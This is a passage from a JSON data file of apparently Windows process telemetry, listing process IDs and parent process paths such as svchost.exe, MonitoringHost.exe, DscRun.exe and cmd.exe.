(1172)\",\"PID: 0x378 (888)\",\"PID: 0x2168 (8552)\",\"PID: 0x254 (596)\",\"PID: 0x2328 (9000)\",\"PID: 0x1834 (6196)\",\"PID: 0xcc0 (3264)\",\"PID: 0x15f8 (5624)\",\"PID: 0x1f7c (8060)\",\"PID: 0x2274 (8820)\",\"PID: 0x22fc (8956)\",\"PID: 0x15c0 (5568)\",\"PID: 0x19c8 (6600)\",\"PID: 0x19e8 (6632)\",\"PID: 0xf98 (3992)\",\"PID: 0xbbc (3004)\",\"PID: 0xb70 (2928)\",\"PID: 0x1590 (5520)\",\"PID: 0x2298 (8856)\",\"PID: 0xe58 (3672)\",\"PID: 0x15e4 (5604)\",\"PID: 0x1f00 (7936)\",\"PID: 0x2384 (9092)\",\"PID: 0xa24 (2596)\",\"PID: 0x1070 (4208)\",\"PID: 0x1df4 (7668)\",\"PID: 0x2044 (8260)\",\"PID: 0x1520 (5408)\",\"PID: 0xedc (3804)\",\"PID: 0x1634 (5684)\",\"PID: 0x1b28 (6952)\",\"PID: 0xd7c (3452)\",\"PID: 0x182c (6188)\",\"PID: 0x2070 (8304)\",\"PID: 0x1f2c (7980)\",\"PID: 0x6f8 (1784)\",\"PID: 0x10c4 (4292)\",\"PID: 0x1de4 (7652)\",\"PID: 0x5ac (1452)\",\"PID: 0x864 (2148)\",\"PID: 0x518 (1304)\",\"PID: 0x1d44 (7492)\",\"PID: 0x48c (1164)\",\"PID: 0xb10 (2832)\",\"PID: 0x5c4 (1476)\",\"PID: 0x23ec (9196)\",\"PID: 0xde4 (3556)\",\"PID: 0x20e4 (8420)\",\"PID: 0x838 (2104)\",\"PID: 0x1914 (6420)\",\"PID: 0x1860 (6240)\",\"PID: 0x1f7c (8060)\",\"PID: 0x1454 (5204)\",\"PID: 0x7c0 (1984)\",\"PID: 0x1844 (6212)\",\"PID: 0x900 (2304)\",\"PID: 0x22c0 (8896)\",\"PID: 0x1ef4 (7924)\",\"PID: 0x11ec (4588)\",\"PID: 0x1d3c (7484)\",\"PID: 0x2010 (8208)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x195c (6492)\",\"PID: 0x600 (1536)\",\"PID: 0xc60 (3168)\",\"PID: 0x1ce8 (7400)\",\"PID: 0x13e0 (5088)\",\"PID: 0x770 (1904)\",\"PID: 0xb70 (2928)\",\"PID: 0x1f84 (8068)\",\"PID: 0xed8 (3800)\",\"PID: 0x21b4 (8628)\",\"PID: 0x1998 (6552)\",\"PID: 0x2204 (8708)\",\"PID: 0x21b0 (8624)\",\"PID: 0x594 (1428)\",\"PID: 0x17e0 (6112)\",\"PID: 0x22b0 (8880)\",\"PID: 0xa2c (2604)\",\"PID: 0x1a00 (6656)\",\"PID: 0x3c4 (964)\",\"PID: 0x1de4 (7652)\",\"PID: 0x2178 (8568)\",\"PID: 0x980 (2432)\",\"PID: 0x1fe0 (8160)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x14ec (5356)\",\"PID: 0xcc8 (3272)\",\"PID: 0xfcc (4044)\",\"PID: 0x1280 (4736)\",\"PID: 0x6f8 (1784)\",\"PID: 0x1a5c (6748)\",\"PID: 0x8bc (2236)\",\"PID: 0x13e4 (5092)\",\"PID: 0x1f60 (8032)\",\"PID: 0x10a4 (4260)\",\"PID: 0x107c (4220)\",\"PID: 0x2130 (8496)\",\"PID: 0x1338 (4920)\",\"PID: 0xc68 (3176)\",\"PID: 0x21d4 (8660)\",\"PID: 0xa94 (2708)\",\"PID: 0x8f0 (2288)\",\"PID: 0x1c20 (7200)\",\"PID: 0x10bc (4284)\",\"PID: 0x12cc (4812)\",\"PID: 0x13a8 (5032)\",\"PID: 0xb48 (2888)\",\"PID: 0x23d8 (9176)\",\"PID: 0x1480 (5248)\",\"PID: 0x15fc (5628)\",\"PID: 0x2298 (8856)\",\"PID: 0x1a44 (6724)\",\"PID: 0x21b4 (8628)\",\"PID: 0x1928 (6440)\",\"PID: 0xdd8 (3544)\",\"PID: 0x1488 (5256)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x850 (2128)\",\"PID: 0x1898 (6296)\",\"PID: 0x2120 (8480)\",\"PID: 0x854 (2132)\",\"PID: 0x91c (2332)\",\"PID: 0x22f4 (8948)\",\"PID: 0xb64 (2916)\",\"PID: 0x1a9c (6812)\",\"PID: 0x17d0 (6096)\",\"PID: 0x17d8 (6104)\",\"PID: 0xd14 (3348)\",\"PID: 0x128c (4748)\",\"PID: 0xb04 (2820)\",\"PID: 0x1c20 (7200)\",\"PID: 0x1360 (4960)\",\"PID: 0x19f0 (6640)\",\"PID: 0x1db0 (7600)\",\"PID: 0xb60 (2912)\",\"PID: 0x125c (4700)\",\"PID: 0x1590 (5520)\",\"PID: 0x11a8 (4520)\",\"PID: 0x1914 (6420)\",\"PID: 0x1058 (4184)\",\"PID: 0x1518 (5400)\",\"PID: 0x5a8 (1448)\",\"PID: 0x53c (1340)\",\"PID: 0x1394 (5012)\",\"PID: 0x838 (2104)\",\"PID: 0x15a8 (5544)\",\"PID: 0x1cdc (7388)\",\"PID: 0x1948 (6472)\",\"PID: 0x634 (1588)\",\"PID: 0x1e8c (7820)\",\"PID: 0x181c (6172)\",\"PID: 0x1b50 (6992)\",\"PID: 0x1e68 (7784)\",\"PID: 0x2348 (9032)\",\"PID: 0x125c (4700)\",\"PID: 0x1374 (4980)\",\"PID: 0xd58 (3416)\",\"PID: 0x2230 (8752)\",\"PID: 0x13c0 (5056)\",\"PID: 0x4e0 (1248)\",\"PID: 0x12e0 (4832)\",\"PID: 0xe00 (3584)\",\"PID: 0xbd0 (3024)\",\"PID: 0xe58 (3672)\",\"PID: 0x1850 (6224)\",\"PID: 0x23ec (9196)\",\"PID: 0x16f4 (5876)\",\"PID: 0x1b74 (7028)\",\"PID: 0x12d0 (4816)\",\"PID: 0x1610 (5648)\",\"PID: 0x648 (1608)\",\"PID: 0x23b8 (9144)\",\"PID: 0xf54 (3924)\",\"PID: 0x20b0 (8368)\",\"PID: 0x1dec (7660)\",\"PID: 0x1bbc (7100)\",\"PID: 0xa24 (2596)\",\"PID: 0x16bc (5820)\",\"PID: 0xf80 (3968)\",\"PID: 0xf08 (3848)\",\"PID: 0xe50 (3664)\",\"PID: 0x490 (1168)\",\"PID: 0xa58 (2648)\",\"PID: 0x1b00 (6912)\",\"PID: 0x23a4 (9124)\",\"PID: 0x1d9c (7580)\",\"PID: 0x1398 (5016)\",\"PID: 0xb28 (2856)\",\"PID: 0x2164 (8548)\",\"PID: 0x1198 (4504)\",\"PID: 0xd04 (3332)\",\"PID: 0xce0 (3296)\",\"PID: 0x3b8 (952)\",\"PID: 0x1f60 (8032)\",\"PID: 0xe08 (3592)\",\"PID: 0x10ac (4268)\",\"PID: 0xb38 (2872)\",\"PID: 0x1480 (5248)\",\"PID: 0xe2c (3628)\",\"PID: 0x1860 (6240)\",\"PID: 0x2048 (8264)\",\"PID: 0x128c (4748)\",\"PID: 0xed8 (3800)\",\"PID: 0x107c (4220)\",\"PID: 0x13f8 (5112)\",\"PID: 0x1940 (6464)\",\"PID: 0x212c (8492)\",\"PID: 0x1f88 (8072)\",\"PID: 0xbd0 (3024)\",\"PID: 0x438 (1080)\",\"PID: 0xbd8 (3032)\",\"PID: 0x115c (4444)\",\"PID: 0x203c (8252)\",\"PID: 0x21b0 (8624)\",\"PID: 0x2328 (9000)\",\"PID: 0x1b28 (6952)\",\"PID: 0xfe0 (4064)\",\"PID: 0x258 (600)\",\"PID: 0x770 (1904)\",\"PID: 0x84c (2124)\",\"PID: 0x248 (584)\",\"PID: 0x2018 (8216)\",\"PID: 0xd70 (3440)\",\"PID: 0xccc (3276)\",\"PID: 0x1680 (5760)\",\"PID: 0x1260 (4704)\",\"PID: 0x23f8 (9208)\",\"PID: 0x1bb4 (7092)\",\"PID: 0xcfc (3324)\",\"PID: 0xdd8 (3544)\",\"PID: 0x1408 (5128)\",\"PID: 0x1ce8 (7400)\",\"PID: 0x1d08 (7432)\",\"PID: 0x1178 (4472)\",\"PID: 0x1dd8 (7640)\",\"PID: 0x10c4 (4292)\",\"PID: 0x1a5c (6748)\",\"PID: 0x8f8 (2296)\",\"PID: 0x2018 (8216)\",\"PID: 0x17ec (6124)\",\"PID: 0x594 (1428)\",\"PID: 0x1f88 (8072)\",\"PID: 0x14d8 (5336)\",\"PID: 0x1b28 (6952)\",\"PID: 0xfc0 (4032)\",\"PID: 0xfc8 (4040)\",\"PID: 0x212c (8492)\",\"PID: 0x23a8 (9128)\",\"PID: 0x1680 (5760)\",\"PID: 0x23e8 (9192)\",\"PID: 0x55c (1372)\",\"PID: 0xadc (2780)\",\"PID: 0x1398 (5016)\",\"PID: 0x1750 (5968)\",\"PID: 0x11f0 (4592)\",\"PID: 0x5ac (1452)\",\"PID: 0xa90 (2704)\",\"PID: 0xc4c (3148)\",\"PID: 0xb00 (2816)\",\"PID: 0x154c (5452)\",\"PID: 0xeb0 (3760)\",\"PID: 0x960 (2400)\",\"PID: 0x158c (5516)\",\"PID: 0x1be0 (7136)\",\"PID: 0x2dc (732)\",\"PID: 0x221c (8732)\",\"PID: 0xc98 (3224)\",\"PID: 0x248 (584)\",\"PID: 0x1878 (6264)\",\"PID: 0x84c (2124)\",\"PID: 0x1898 (6296)\",\"PID: 0x6c0 (1728)\",\"PID: 0x125c (4700)\",\"PID: 0x1374 (4980)\",\"PID: 0xf58 (3928)\",\"PID: 0x67c (1660)\",\"PID: 0xefc (3836)\",\"PID: 0x13d8 (5080)\",\"PID: 0x19e8 (6632)\",\"PID: 0x7fc (2044)\",\"PID: 0x107c (4220)\",\"PID: 0x1ef4 (7924)\",\"PID: 0x19f4 (6644)\",\"PID: 0x2020 (8224)\",\"PID: 0x918 (2328)\",\"PID: 0xf20 (3872)\",\"PID: 0x1008 (4104)\",\"PID: 0x23ec (9196)\",\"PID: 0x2274 (8820)\",\"PID: 0x1f88 (8072)\",\"PID: 0x239c (9116)\",\"PID: 0x1770 (6000)\",\"PID: 0xfc0 (4032)\",\"PID: 0x7f8 (2040)\",\"PID: 0x1860 (6240)\",\"PID: 0x1dec (7660)\",\"PID: 0xb00 (2816)\",\"PID: 0xeb0 (3760)\",\"PID: 0x158c (5516)\",\"PID: 0x794 (1940)\",\"PID: 0x458 (1112)\",\"PID: 0x1b00 (6912)\",\"PID: 0xb28 (2856)\",\"PID: 0x634 (1588)\",\"PID: 0x16a8 (5800)\",\"PID: 0x1e68 (7784)\",\"PID: 0xa98 (2712)\",\"PID: 0x14c8 (5320)\",\"PID: 0x6c0 (1728)\",\"PID: 0x22c0 (8896)\",\"PID: 0x2280 (8832)\",\"PID: 0xccc (3276)\",\"PID: 0x67c (1660)\",\"PID: 0x878 (2168)\",\"PID: 0x13d8 (5080)\",\"PID: 0x1458 (5208)\",\"PID: 0xa24 (2596)\",\"PID: 0x1cd8 (7384)\",\"PID: 0x1420 (5152)\",\"PID: 0x8f8 (2296)\",\"PID: 0xc5c (3164)\",\"PID: 0x1f88 (8072)\",\"PID: 0x1cd8 (7384)\",\"PID: 0x19d8 (6616)\",\"PID: 0x1e3c (7740)\",\"PID: 0x1a9c (6812)\",\"PID: 0x1770 (6000)\",\"PID: 0x1260 (4704)\",\"PID: 0x55c (1372)\",\"PID: 0x115c (4444)\",\"PID: 0x2068 (8296)\",\"PID: 0x11dc (4572)\",\"PID: 0x13e4 (5092)\",\"PID: 0x1524 (5412)\",\"PID: 0x17b0 (6064)\",\"PID: 0x8c4 (2244)\",\"PID: 0x2228 (8744)\",\"PID: 0x1cf0 (7408)\",\"PID: 0x1860 (6240)\",\"PID: 0x1874 (6260)\",\"PID: 0xa90 (2704)\",\"PID: 0x11a8 (4520)\",\"PID: 0x173c (5948)\",\"PID: 0x1910 (6416)\",\"PID: 0x1db4 (7604)\",\"PID: 0x438 (1080)\",\"PID: 0x2018 (8216)\",\"PID: 0x21c8 (8648)\",\"PID: 0x2044 (8260)\",\"PID: 0x2200 (8704)\",\"PID: 0x1124 (4388)\",\"PID: 0xd44 (3396)\",\"PID: 0x1c24 (7204)\",\"PID: 0x1198 (4504)\",\"PID: 0x135c (4956)\",\"PID: 0xd04 (3332)\",\"PID: 0x2364 (9060)\",\"PID: 0x1110 (4368)\",\"PID: 0x994 (2452)\",\"PID: 0x2328 (9000)\",\"PID: 0x6d4 (1748)\",\"PID: 0x20e4 (8420)\",\"PID: 0x1998 (6552)\",\"PID: 0xf54 (3924)\",\"PID: 0x5a8 (1448)\",\"PID: 0x1db8 (7608)\",\"PID: 0x1fa4 (8100)\",\"PID: 0x604 (1540)\",\"PID: 0x1f24 (7972)\",\"PID: 0x518 (1304)\",\"PID: 0x2170 (8560)\",\"PID: 0x12a8 (4776)\",\"PID: 0x200c (8204)\",\"PID: 0xf80 (3968)\",\"PID: 0x1860 (6240)\",\"PID: 0x1874 (6260)\",\"PID: 0xccc (3276)\",\"PID: 0xd7c (3452)\",\"PID: 0x1634 (5684)\",\"PID: 0x1748 (5960)\",\"PID: 0x1898 (6296)\",\"PID: 0x1eb4 (7860)\",\"PID: 0x1468 (5224)\",\"PID: 0x2200 (8704)\",\"PID: 0x1e8c (7820)\",\"PID: 0x2348 (9032)\",\"PID: 0x11f0 (4592)\",\"PID: 0x1f20 (7968)\",\"PID: 0x1480 (5248)\",\"PID: 0x220 (544)\",\"PID: 0x980 (2432)\",\"PID: 0x1704 (5892)\",\"PID: 0x1520 (5408)\",\"PID: 0x16cc (5836)\",\"PID: 0xfd4 (4052)\",\"PID: 0x53c (1340)\",\"PID: 0xbbc (3004)\",\"PID: 0x23e8 (9192)\",\"PID: 0xdf8 (3576)\",\"PID: 0x1c50 (7248)\",\"PID: 0x394 (916)\",\"PID: 0x105c (4188)\",\"PID: 0xd44 (3396)\",\"PID: 0x994 (2452)\",\"PID: 0x17e0 (6112)\",\"PID: 0xa58 (2648)\",\"PID: 0x1564 (5476)\",\"PID: 0x1328 (4904)\",\"PID: 0x1e3c (7740)\",\"PID: 0x1fa8 (8104)\",\"PID: 0x12d4 (4820)\",\"PID: 0x1f38 (7992)\",\"PID: 0x239c (9116)\",\"PID: 0x2320 (8992)\",\"PID: 0x1f3c (7996)\",\"PID: 0x11f0 (4592)\",\"PID: 0x864 (2148)\",\"PID: 0x8dc (2268)\",\"PID: 0x183c (6204)\",\"PID: 0xd74 (3444)\",\"PID: 0x21c8 (8648)\",\"PID: 0x6f8 (1784)\",\"PID: 0x1c24 (7204)\",\"PID: 0x1fc0 (8128)\",\"PID: 0x17a4 (6052)\",\"PID: 0x10bc (4284)\",\"PID: 0x1c10 (7184)\",\"PID: 0xb48 (2888)\",\"PID: 0x235c (9052)\",\"PID: 0xbd0 (3024)\",\"PID: 0x1468 (5224)\",\"PID: 0x15c8 (5576)\",\"PID: 0x1278 (4728)\",\"PID: 0xe34 (3636)\",\"PID: 0xbc (188)\",\"PID: 0x53c (1340)\",\"PID: 0x1834 (6196)\",\"PID: 0xef4 (3828)\",\"PID: 0x15f4 (5620)\",\"PID: 0xcd8 (3288)\",\"PID: 0xfd4 (4052)\",\"PID: 0x181c (6172)\",\"PID: 0xbc (188)\",\"PID: 0x1b28 (6952)\",\"PID: 0x1d6c (7532)\",\"PID: 0x15f4 (5620)\",\"PID: 0xda8 (3496)\",\"PID: 0x16e0 (5856)\",\"PID: 0xbb4 (2996)\",\"PID: 0x11f4 (4596)\",\"PID: 0x12d0 (4816)\",\"PID: 0xce0 (3296)\",\"PID: 0x1994 (6548)\",\"PID: 0x123c (4668)\",\"PID: 0x20b0 (8368)\",\"PID: 0xccc (3276)\",\"PID: 0x14ec (5356)\",\"PID: 0xda8 (3496)\",\"PID: 0x1cfc (7420)\",\"PID: 0x7fc (2044)\",\"PID: 0x108c (4236)\",\"PID: 0x798 (1944)\",\"PID: 0x22e0 (8928)\",\"PID: 0x172c (5932)\",\"PID: 0x1dec (7660)\",\"PID: 0xe2c (3628)\",\"PID: 0x1080 (4224)\",\"PID: 0xb14 (2836)\",\"PID: 0x17ec (6124)\",\"PID: 0x1898 (6296)\",\"PID: 0x1058 (4184)\",\"PID: 0xe1c (3612)\",\"PID: 0x834 (2100)\",\"PID: 0x17c4 (6084)\",\"PID: 0x88c (2188)\",\"PID: 0x2e4 (740)\",\"PID: 0x108c (4236)\",\"PID: 0x1360 (4960)\",\"PID: 0x19f4 (6644)\",\"PID: 0x19f0 (6640)\",\"PID: 0x1570 (5488)\",\"PID: 0x17a8 (6056)\",\"PID: 0x1058 (4184)\",\"PID: 0x82c (2092)\",\"PID: 0xd44 (3396)\",\"PID: 0x1bfc (7164)\",\"PID: 0x1998 (6552)\",\"PID: 0x1c10 (7184)\",\"PID: 0x1184 (4484)\",\"PID: 0xc6c (3180)\",\"PID: 0x454 (1108)\",\"PID: 0x65c (1628)\",\"PID: 0xe1c (3612)\",\"PID: 0x1070 (4208)\",\"PID: 0x1ce8 (7400)\",\"PID: 0xb10 (2832)\",\"PID: 0x2260 (8800)\",\"PID: 0x1c54 (7252)\",\"PID: 0x181c (6172)\",\"PID: 0x8c0 (2240)\",\"PID: 0x1f60 (8032)\",\"PID: 0x123c (4668)\",\"PID: 0x518 (1304)\",\"PID: 0xc98 (3224)\",\"PID: 0x1cdc (7388)\",\"PID: 0x1484 (5252)\",\"PID: 0xb14 (2836)\",\"PID: 0x16bc (5820)\",\"PID: 0x1bb4 (7092)\",\"PID: 0x1be4 (7140)\",\"PID: 0xec4 (3780)\",\"PID: 0xd68 (3432)\",\"PID: 0xb64 (2916)\",\"PID: 0x1eb4 (7860)\",\"PID: 0xc98 (3224)\",\"PID: 0x6f8 (1784)\",\"PID: 0x84c (2124)\",\"PID: 0x1d6c (7532)\",\"PID: 0x490 (1168)\",\"PID: 0x16d4 (5844)\",\"PID: 0xa2c (2604)\",\"PID: 0x65c (1628)\",\"PID: 0x12fc (4860)\",\"PID: 0xd78 (3448)\",\"PID: 0x221c (8732)\",\"PID: 0x1238 (4664)\",\"PID: 0x1584 (5508)\",\"PID: 0x7c8 (1992)\",\"PID: 0x1420 (5152)\",\"PID: 0x20e4 (8420)\",\"PID: 0x9ac (2476)\",\"PID: 0x1078 (4216)\",\"PID: 0x1ea8 (7848)\",\"PID: 0x1a44 (6724)\",\"PID: 0x15b8 (5560)\",\"PID: 0x1da8 (7592)\",\"PID: 0x99c (2460)\",\"PID: 0x974 (2420)\",\"PID: 0x2280 (8832)\",\"PID: 0x205c (8284)\",\"PID: 0x1360 (4960)\",\"PID: 0x11d4 (4564)\",\"PID: 0xaec (2796)\",\"PID: 0x1cc4 (7364)\",\"PID: 0x220c (8716)\",\"PID: 0xc14 (3092)\",\"PID: 0x1f24 (7972)\",\"PID: 0x1b74 (7028)\",\"PID: 0x1620 (5664)\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program 